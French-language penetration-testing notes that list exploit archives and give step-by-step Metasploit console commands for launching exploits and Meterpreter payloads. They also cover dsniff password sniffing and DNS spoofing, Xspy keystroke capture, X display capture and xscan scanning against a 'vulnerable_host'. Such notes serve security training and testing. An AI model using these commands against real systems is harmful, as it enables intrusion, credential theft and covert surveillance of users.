http://www.securityfocus.com/
http://www.securiteam.com/exploits/
http://www.lsd-pl.net/vulnerabilities.html
http://www.insecure.org/sploits.html
http://www.securitytube.net/
http://packetstormsecurity.org/
http://www.exploit-db.com
1. Scanneurs de vulnérabilités
Généralement peu discret face au NIDS
Nessus
(http://www.nessus.org/)
SAINT (http://www.wwdsi.com/saint/)
SAINT (http://www.wwdsi.com/saint/)
Metasploit (http://www.metasploit.com/)
2. Metasploit
Metasploit Framework & organisation :
Différentes interfaces sont disponibles : msfgui / msfweb/ msfcli / msfd /msfconsole
Après avoir compris les fondamentaux de Metasploit voir également Armitage qui propose une interface conviviale et épurée.
Après avoir compris les fondamentaux de Metasploit voir également Armitage qui propose une interface conviviale et épurée.
- Trouver des exploits en fonction de l'OS
#ls /pentest/exploits/framework/modules/exploits/
- Les modules auxiliaires comprennent les applications pour scanner et analyser
#ls /pentest/exploits/framework/modules/auxiliary/
- Répertoire des outils (ex : exe2vba.rb)
#ls pentest/exploits/framework/tools
- Utilisation de Metasploit
Accéder au Framework Metasploit
#./msfconsole
Obtenir les commandes dans msfconsole
#msf > ?
- Vérifier les exploits disponibles
#msf> show exploits
- Vérifier les payloads disponibles
#msf> show payloads
3 types de Payload:
-Singles
-Stagers
-Stages
- Utiliser les commandes de recherches
#msf> search xp
- Use the use commands to launch exploits and more
#msf> use xp
- Show options for the modules
#msf exploit xp > show options
- Configure the module options
#msf exploit xp > set RHOST 192.168.1.2
Lancer l'Exploit et le Payload associé: pour un Exploit plusieurs Payload peuvent-etre utilisé.
- Premièrement lister les Payload
#msf exploit xp > set PAYLOAD
- Sélectionner un Payload
#msf exploit xp > set PAYLOAD windows/user
- Lancer
#msf exploit xp > exploit
- Trouver des exploits :
http://www.cve.mitre.org/
http://osvdb.org/
http://securityfocus.com
- Copier les Payloads ou les Exploits dans un fichier
#vim dcom.c
- Compiler le code:
#gcc dcom.c
Les Bases de Meterpreter et de stdapi
Outrepasser les limitations du Payload en utilisant
Meterpreter:
- migration des processus mémoire
- exécution de commandes
- lecture et écriture du registre
- accès aux fichiers système
En utilisant l'injection de DLL en mémoire, cela ne laisse aucune trace sur le HD.
- migration des processus mémoire
- exécution de commandes
- lecture et écriture du registre
- accès aux fichiers système
En utilisant l'injection de DLL en mémoire, cela ne laisse aucune trace sur le HD.
·
Une fois l'Exploit lancé, expédier le Payload windows/meterpreter/bind_tcp
#msf exploit xp> set PAYLOAD
windows/meterpreter/bind_tcp
#msf exploit xp > show options
#msf exploit xp > exploit
#meterpreter >
· Commandes de bases
#meterpreter > ?
3. DSniff
Dsniff est un sniffer de mot de passe avec un ensemble d'utilitaires pouvant analyser différents protocoles d'applications et en extraire les informations.
/etc/dsniff/
/etc/dsniff/dnsspoof.hosts
--> Sample hosts file. If no hostfile is specified, replies will forged for
all address queries on the LAN with an answer of the local machine’s IP
address.
/etc/dsniff/dsniff.magic
--> Network protocol magic
/etc/dsniff/dsniff.services
--> Default trigger table
4. Xspy
Xspy permet de capturer la frappe au clavier
(http://www.acm.vt.edu/~jmaxwell/programs/xspy/xspy.html)
#./xspy
-display vulnerable_host:0
ls
who
rlogin -l
user01 host passwd
5. XWD : Capturer le Display
#/usr/X11R6/bin/xwd
-display vulnerable_host:0 -root -out file.dmp
#/usr/X11R6/bin/xwud
-in file.dmp
6. Finger : obtenir des comptes valides
L'accès à ce service est restreint par les TCP Wrappers: il
faut avoir recours, soit à l’IP Spoofing, soit au finger forwarding pour
obtenir ces informations.
7. XScan
Un scanneur généraliste sur les vulnérabilités réseau : support NASL, détecte les types de services, les OS distants et les faiblesses des mots de passe
http://www.martnet.com/~johnny/exploits/X/xscan.c
http://www.middlegeorgia.org/video/xscan.html
#./xscan
192.168.1.X –s
Trying
192.168.1.43 .Socket is already connected --> Vulnérable